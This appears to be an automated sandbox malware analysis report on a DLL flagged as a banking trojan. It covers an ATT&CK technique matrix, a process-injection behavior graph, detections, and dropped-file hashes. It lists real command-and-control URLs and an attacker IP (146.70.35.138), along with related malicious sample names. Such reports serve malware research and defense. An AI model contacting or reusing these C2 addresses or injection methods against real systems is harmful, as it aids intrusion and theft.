                      Source: Yara matchFile source: 00000003.00000003.566002484.0000000004C79000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.568306199.0000000002E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.569427566.000000000512F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                      Mitre Att&ck Matrix

                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts1
                      Windows Management Instrumentation                      		Path Interception812
                      Process Injection                      		1
                      Obfuscated Files or Information                      		OS Credential Dumping1
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		Exfiltration Over Other Network Medium2
                      Ingress Tool Transfer                      		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                      Data Encrypted for Impact
                      Default Accounts2
                      Native API                      		Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      File Deletion                      		LSASS Memory1
                      Account Discovery                      		Remote Desktop Protocol1
                      Email Collection                      		Exfiltration Over Bluetooth2
                      Encrypted Channel                      		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts1
                      Command and Scripting Interpreter                      		Logon Script (Windows)Logon Script (Windows)1
                      Masquerading                      		Security Account Manager1
                      File and Directory Discovery                      		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
                      Non-Application Layer Protocol                      		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)31
                      Virtualization/Sandbox Evasion                      		NTDS25
                      System Information Discovery                      		Distributed Component Object ModelInput CaptureScheduled Transfer11
                      Application Layer Protocol                      		SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script812
                      Process Injection                      		LSA Secrets1
                      Query Registry                      		SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common1
                      Rundll32                      		Cached Domain Credentials11
                      Security Software Discovery                      		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSync31
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem3
                      Process Discovery                      		Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                      System Owner/User Discovery                      		Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                      Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronRight-to-Left OverrideInput Capture11
                      Remote System Discovery                      		Replication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                      Compromise Software Supply ChainUnix ShellLaunchdLaunchdRename System UtilitiesKeylogging1
                      System Network Configuration Discovery                      		Component Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 613862 Sample: HxEWwh74qT Startdate: 22/04/2022 Architecture: WINDOWS Score: 100 63 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->63 65 Found malware configuration 2->65 67 Malicious sample detected (through community Yara rule) 2->67 69 9 other signatures 2->69 9 loaddll32.exe 1 2->9         started        11 mshta.exe 19 2->11         started        process3 process4 13 cmd.exe 1 9->13         started        15 WerFault.exe 3 9 9->15         started        18 WerFault.exe 2 9 9->18         started        20 WerFault.exe 3 9 9->20         started        22 powershell.exe 33 11->22         started        dnsIp5 25 rundll32.exe 1 6 13->25         started        61 192.168.2.1 unknown unknown 15->61 71 Injects code into the Windows Explorer (explorer.exe) 22->71 73 Writes to foreign memory regions 22->73 75 Modifies the context of a thread in another process (thread injection) 22->75 77 2 other signatures 22->77 29 explorer.exe 22->29 injected 31 csc.exe 3 22->31         started        34 csc.exe 22->34         started        36 conhost.exe 22->36         started        signatures6 process7 dnsIp8 59 146.70.35.138, 49775, 80 TENET-1ZA United Kingdom 25->59 91 System process connects to network (likely due to code injection or exploit) 25->91 93 Writes to foreign memory regions 25->93 95 Modifies the context of a thread in another process (thread injection) 25->95 105 2 other signatures 25->105 38 control.exe 25->38         started        97 Changes memory attributes in foreign processes to executable or writable 29->97 99 Self deletion via cmd delete 29->99 101 Disables SPDY (HTTP compression, likely to perform web injects) 29->101 103 Creates a thread in another existing process (thread injection) 29->103 41 cmd.exe 29->41         started        43 RuntimeBroker.exe 29->43 injected 45 cmd.exe 29->45         started        55 C:\Users\user\AppData\Local\...\pkbugtxo.dll, PE32 31->55 dropped 47 cvtres.exe 1 31->47         started        57 C:\Users\user\AppData\Local\...\lboh4mlq.dll, PE32 34->57 dropped 49 cvtres.exe 34->49         started        file9 signatures10 process11 signatures12 79 Changes memory attributes in foreign processes to executable or writable 38->79 81 Injects code into the Windows Explorer (explorer.exe) 38->81 83 Writes to foreign memory regions 38->83 89 4 other signatures 38->89 85 Uses ping.exe to sleep 41->85 87 Uses ping.exe to check the status of other devices and networks 41->87 51 conhost.exe 41->51         started        53 PING.EXE 41->53         started        process13

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      HxEWwh74qT.dll37%VirustotalBrowse
                      HxEWwh74qT.dll31%ReversingLabsWin32.Trojan.Lazy
                      HxEWwh74qT.dll100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      SourceDetectionScannerLabelLinkDownload
                      3.2.rundll32.exe.4de0000.0.unpack100%AviraHEUR/AGEN.1245293Download File

                      Domains

                      SourceDetectionScannerLabelLink
                      l-0007.l-dc-msedge.net0%VirustotalBrowse
                      a-0019.standard.a-msedge.net0%VirustotalBrowse

                      URLs

                      SourceDetectionScannerLabelLink
                      http://146.70.35.138/phpadmin/1p0semBcWFOiJ/VuHxHtu5/AN830nRWQ1d2xctaoA3KLHR/918Z9VEhPV/P8ohXldFwnNmepL6Q/uKTfc4fmSrkK/BfYNKcK_2Bx/w_2FA1ltM5KCgm/3UT06OWaufeDOP8Oq_2FL/oIF6meLVrySmPHH0/RIFJ_2FHuhWguIS/4hvBrDpXZ_2FB9M_2F/VjlCK_2FC/TflkNLJtzRIEzaze5_2F/wDsLbDghNL5li48V5rm/4qe0lRbO5_2FdP6RKk3aIg/j40b09twfw_2F/PdHkwNcC/i0_2BVuZ/L.src0%Avira URL Cloudsafe
                      http://146.70.35.138/phpadmin/sJOLDU_2FhOUoo/k46SW66GV6I1pQKjWA9TE/PWpby4hvIkOnAKsS/x0Aee5T7Xyol_2F/mHBJFq72pa7ZryIdq5/j7jpLfh_2/B9C_2B8rr1N7pwYs7Hbz/HAjnG5DvkxUUwsnvZ2H/7mKa3lBAhH1k0Vg5CBUe72/SPp1Kc_2FZv6K/7UGQxmIh/q1dxSy205p9HqV1EWhDaIi0/wpq760vWJe/2wvTRaTBNSXKAlgWL/PHcpI3wJ6a_2/BROCpFJpoTX/N2ZuQyATVgKAeO/_2Fd3SdF.src0%Avira URL Cloudsafe
                      http://https://file://USER.ID%lu.exe/upd0%Avira URL Cloudsafe
                      http://ns.adobY0%URL Reputationsafe
                      http://constitution.org/usdeclar.txt0%URL Reputationsafe
                      http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
                      http://constitution.org/usdeclar.txtC:0%URL Reputationsafe

                      Domains and IPs

                      Contacted Domains

                      NameIPActiveMaliciousAntivirus DetectionReputation
                      l-0007.l-dc-msedge.net
                      		13.107.43.16
                      		truetrueunknown
                      a-0019.standard.a-msedge.net
                      		204.79.197.222
                      		truefalseunknown

                      Contacted URLs

                      NameMaliciousAntivirus DetectionReputation
                      http://146.70.35.138/phpadmin/1p0semBcWFOiJ/VuHxHtu5/AN830nRWQ1d2xctaoA3KLHR/918Z9VEhPV/P8ohXldFwnNmepL6Q/uKTfc4fmSrkK/BfYNKcK_2Bx/w_2FA1ltM5KCgm/3UT06OWaufeDOP8Oq_2FL/oIF6meLVrySmPHH0/RIFJ_2FHuhWguIS/4hvBrDpXZ_2FB9M_2F/VjlCK_2FC/TflkNLJtzRIEzaze5_2F/wDsLbDghNL5li48V5rm/4qe0lRbO5_2FdP6RKk3aIg/j40b09twfw_2F/PdHkwNcC/i0_2BVuZ/L.srctrue
                      • Avira URL Cloud: safe
                      		unknown
                      http://146.70.35.138/phpadmin/sJOLDU_2FhOUoo/k46SW66GV6I1pQKjWA9TE/PWpby4hvIkOnAKsS/x0Aee5T7Xyol_2F/mHBJFq72pa7ZryIdq5/j7jpLfh_2/B9C_2B8rr1N7pwYs7Hbz/HAjnG5DvkxUUwsnvZ2H/7mKa3lBAhH1k0Vg5CBUe72/SPp1Kc_2FZv6K/7UGQxmIh/q1dxSy205p9HqV1EWhDaIi0/wpq760vWJe/2wvTRaTBNSXKAlgWL/PHcpI3wJ6a_2/BROCpFJpoTX/N2ZuQyATVgKAeO/_2Fd3SdF.srctrue
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://https://file://USER.ID%lu.exe/updrundll32.exe, 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		low
                      http://ns.adobYexplorer.exe, 00000021.00000000.523469701.00000000026D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.572314670.00000000026D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.526704286.00000000026D0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000021.00000000.562762119.00000000026D0000.00000004.00000001.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://constitution.org/usdeclar.txtrundll32.exe, 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000014.00000002.767708483.000002DC67F3F000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000014.00000002.767419442.000002DC67D31000.00000004.00000800.00020000.00000000.sdmpfalse
                        		high
                        http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000014.00000002.767708483.000002DC67F3F000.00000004.00000800.00020000.00000000.sdmpfalse
                          		high
                          https://github.com/Pester/Pesterpowershell.exe, 00000014.00000002.767708483.000002DC67F3F000.00000004.00000800.00020000.00000000.sdmpfalse
                            		high
                            http://constitution.org/usdeclar.txtC:rundll32.exe, 00000003.00000003.491963654.0000000006098000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.766882377.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000003.513984044.000002DC00CFC000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518242223.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000001D.00000003.518050705.000001BF7E55C000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown

                            World Map of Contacted IPs

                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs

                            Public IPs

                            IPDomainCountryFlagASNASN NameMalicious
                            146.70.35.138
                            		unknownUnited Kingdom
                            		2018TENET-1ZAtrue

                            Private

                            IP
                            192.168.2.1

                            General Information

                            Joe Sandbox Version:34.0.0 Boulder Opal
                            Analysis ID:613862
                            Start date and time: 22/04/202215:25:252022-04-22 15:25:25 +02:00
                            Joe Sandbox Product:CloudBasic
                            Overall analysis duration:0h 13m 32s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Sample file name:HxEWwh74qT (renamed file extension from none to dll)
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                            Number of analysed new started processes analysed:41
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:2
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • HDC enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Detection:MAL
                            Classification:mal100.bank.troj.evad.winDLL@28/29@0/2
                            EGA Information:
                            • Successful, ratio: 75%
                            HDC Information:
                            • Successful, ratio: 77.6% (good quality ratio 73.3%)
                            • Quality average: 80.8%
                            • Quality standard deviation: 28.6%
                            HCA Information:
                            • Successful, ratio: 100%
                            • Number of executed functions: 77
                            • Number of non-executed functions: 20
                            Cookbook Comments:
                            • Adjust boot time
                            • Enable AMSI
                            • Override analysis time to 240s for rundll32

                            Warnings

                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                            • Excluded IPs from analysis (whitelisted): 20.42.65.92, 13.107.43.16, 52.182.143.212
                            • Excluded domains from analysis (whitelisted): fp.msedge.net, client.wns.windows.com, fs.microsoft.com, config.edge.skype.com.trafficmanager.net, arc.msn.com, ris.api.iris.microsoft.com, onedsblobprdeus17.eastus.cloudapp.azure.com, onedsblobprdcus15.centralus.cloudapp.azure.com, login.live.com, l-0007.config.skype.com, config-edge-skype.l-0007.l-msedge.net, blobcollector.events.data.trafficmanager.net, sls.update.microsoft.com, 1.perf.msedge.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, config.edge.skype.com
                            • Execution Graph export aborted for target mshta.exe, PID 6304 because there are no executed function
                            • Not all processes where analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtReadVirtualMemory calls found.

                            Simulations

                            Behavior and APIs

                            TimeTypeDescription
                            15:26:45API Interceptor1x Sleep call for process: rundll32.exe modified
                            15:26:53API Interceptor2x Sleep call for process: WerFault.exe modified
                            15:27:31API Interceptor31x Sleep call for process: powershell.exe modified

                            Joe Sandbox View / Context

                            IPs

                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                            146.70.35.138b.exeGet hashmaliciousBrowse
                              0x0007000000012676-63.exeGet hashmaliciousBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                a-0019.standard.a-msedge.netSecuriteInfo.com.Trojan.DownLoader44.47620.31238.dllGet hashmaliciousBrowse
                                • 204.79.197.222
                                https://u18128412.ct.sendgrid.net/ls/click?upn=ClQ3u4srWH1DLgg8yUCqjFuIqSkhaE0H41NlZHnpXF50n1dcOFFkYo3z5RtKfZ8x-2F76tDiFmc2e1L-2FVZLlKBrK2CrdgqYFJtTYbAiN7v1sXGtxtRhF0goQDt7fy7SnPPQQJO_udT3v8hfWpShd4l40iR1YjDwBF203d0tl3LIdyVMOSuA20GEIOKQduBpjuvr26O-2Fnj9cEw-2BjOJLLZRFgtlHhZGSbfQJIGzdKSRmcz6dYOq8WEr8avEC5ts5-2BSGOZMjlfDg4wAHy4KbgCF1ox-2BU8-2F6O0Cwukxea5IPYuarnBfwlL-2B6p31Mu2l-2BYlu-2BvlWBdkKZTTl7tQhBttD09hiqQinzJ-2FRzwFMCPsSi5vYeIXks-2Bg-3DGet hashmaliciousBrowse
                                • 204.79.197.222
                                nidaz.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                SecuriteInfo.com.Variant.Bulz.709809.27666.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                N7oJYgvm4B.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                iIsis8FI6u.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                csbMM44im8.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                Z3ADN6GmL1.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                ffdshowInstall.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                sq564FoU8n.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                D0h6VtFChM.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                S3sktQcYXPChxy5.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                Sales Contract.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                uL2e4sO4i1.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                Gp2M1wXObH.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                lGbJyJcFAU.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                dhl_doc1755860002.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                v4AXSw6EGK.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                Order confirmation.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                Ordem de Compra.pdf.exeGet hashmaliciousBrowse
                                • 204.79.197.222
                                l-0007.l-dc-msedge.net6253ed88d7cd5.dllGet hashmaliciousBrowse
                                • 13.107.43.16
                                624c84a8263d3.dllGet hashmaliciousBrowse
                                • 13.107.43.16

                                ASNs

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                TENET-1ZAo0nBmbV6auGet hashmaliciousBrowse
                                • 163.200.142.51
                                84wwQQbbDjGet hashmaliciousBrowse
                                • 143.128.168.158
                                o2AHUUgivhGet hashmaliciousBrowse
                                • 146.239.92.86
                                b.exeGet hashmaliciousBrowse
                                • 146.70.35.138
                                bKhQyaq7WP.exeGet hashmaliciousBrowse
                                • 146.70.87.230
                                wZtQzFZJYa.exeGet hashmaliciousBrowse
                                • 146.70.87.230
                                H7qgr6X0nvGet hashmaliciousBrowse
                                • 155.233.139.115
                                eoT6xLnNfY.exeGet hashmaliciousBrowse
                                • 146.70.87.230
                                jew.x86Get hashmaliciousBrowse
                                • 146.69.137.13
                                sora.armGet hashmaliciousBrowse
                                • 155.232.149.247
                                irq0Get hashmaliciousBrowse
                                • 146.68.19.240
                                l0zzxRl556.exeGet hashmaliciousBrowse
                                • 146.70.87.230
                                wuxznEjJoIGet hashmaliciousBrowse
                                • 143.128.168.138
                                BKpr0Ubn9lGet hashmaliciousBrowse
                                • 196.249.7.64
                                pandora.arm7-20220417-1500Get hashmaliciousBrowse
                                • 152.106.89.16
                                daddyl33t.arm-20220414-2250Get hashmaliciousBrowse
                                • 146.141.78.228
                                0x0007000000012676-63.exeGet hashmaliciousBrowse
                                • 146.70.35.138
                                510mZMDMrAGet hashmaliciousBrowse
                                • 146.232.14.37
                                sora.mpslGet hashmaliciousBrowse
                                • 196.24.222.225
                                cK1mF6pCC9Get hashmaliciousBrowse
                                • 146.68.82.22

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_2828325eddc3a9f8faabde465b0f08bdb67a44e_7cac0383_17ca004a\Report.wer

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8464047761659802
                                Encrypted:false
                                SSDEEP:96:85XB+F6wnYypy9haoKzfFEpXIQcQRc6+vcECAcw3p+a+z+HbHgiTAS/Y5ZU6h5P6:8pB+7nSHPKvBdjlq/u7sDS274ItW
                                MD5:B50C687C29BF44DAF94017951E1B1FA4
                                SHA1:035A1C3720BC2834F2EEA0B5C5C012FFCFA54D59
                                SHA-256:2B8D1BCCBD738DC93D23DB997E54B92B08D8E46F1DA33DA0159495779135CCD0
                                SHA-512:749ADFCD605FB1A481BD7387B9F447457050DE42C0F57139F9484EB263EE92A7451039AC45EF6E928D93B5D735FE058F194D1D43BEDE11862AB322AB284A97FA
                                Malicious:false
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.4.0.0.1.9.1.8.2.1.7.8.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.4.0.0.2.1.7.9.1.5.3.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.b.b.d.0.0.1.3.-.3.d.b.f.-.4.d.7.f.-.8.8.c.1.-.6.7.0.7.0.3.6.a.7.0.4.1.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.4.5.b.3.1.7.-.b.8.9.3.-.4.9.1.7.-.b.2.f.8.-.e.5.c.d.f.0.e.1.0.7.1.5.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.8.-.0.0.0.1.-.0.0.1.8.-.9.5.4.9.-.0.5.0.9.9.8.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_82d8da601ff98714cf9338fbdd7f7aa4314182a_7cac0383_186e5281\Report.wer

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8494287362949074
                                Encrypted:false
                                SSDEEP:96:88XxGFrhPwnYyTy9haot7JnXpXIQcQac6pcEccw35+a+z+HbHgiTAS/Y5ZU6h5Pg:8c8hynSH0tGtjlq/u7syS274ItW
                                MD5:25AA9B5977F4E6E9486A6B0AA7367E53
                                SHA1:49203D9B2C61AF1B0886A6DCF260AA93CA21B2BB
                                SHA-256:83C38D8B07784190C93DD783EE9D288CE2522B878FC5082287770ADAE6C7C018
                                SHA-512:21BC08B3F8B1445C51C6C45A996D87811B58E18F55AC3DAD19DF5675AD7A82B4552F3FEB909001E92E4045AE9A84D5C23C857A613A3DF57B5A38813345F5559E
                                Malicious:false
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.9.5.1.4.0.0.0.9.5.4.4.5.4.0.0.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.9.5.1.4.0.0.1.1.9.9.7.5.4.9.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.7.8.1.3.5.a.1.-.4.b.e.d.-.4.5.3.8.-.8.e.b.5.-.1.e.7.d.f.5.8.c.a.2.3.3.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.7.d.d.a.2.2.c.-.7.d.e.a.-.4.f.8.3.-.a.d.7.1.-.1.7.3.5.d.5.7.6.3.5.e.e.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.l.o.a.d.d.l.l.3.2...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.a.8.-.0.0.0.1.-.0.0.1.8.-.9.5.4.9.-.0.5.0.9.9.8.5.6.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.0.0.0.0.d.a.3.9.a.3.e.e.5.e.6.b.4.b.0.d.3.2.5.5.b.f.e.f.9.5.6.0.1.8.9.0.a.f.d.8.0.7.0.9.!.l.o.a.d.d.l.l.3.2...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.

                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_loaddll32.exe_f73ca53a05f727fe3c280efd3588c9d22d24062_7cac0383_0d5dc489\Report.wer

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8429193116744815
                                Encrypted:false
                                SSDEEP:96:xqjA46wnYyNy9haoK7FISZpXIQcQac6pcEccw35+a+z+HbHgiTAS/Y5ZU6h5PMLv:xgnxH0tGtjlq/u7sDS274Itb
                                MD5:B662C448457F42C86FF6AE872E829F12
                                SHA1:6B760A764DFF5FEDE5A923E3953359ABE59BF098
                                SHA-256:BCA2030589C0C03A6958D7A5A60968DDE5EF57E5FE4861A63A6EF3D687A1F6F0
                                SHA-512:963A1D9194D6E19BAA6017D869B19420FE20A2A8839A570E7B3B21EF9CF0337FFA35C32913BF72556B612D8FBCFFC096D197F5D7A9A557F35F641EA84B2809B1
                                Malicious:false
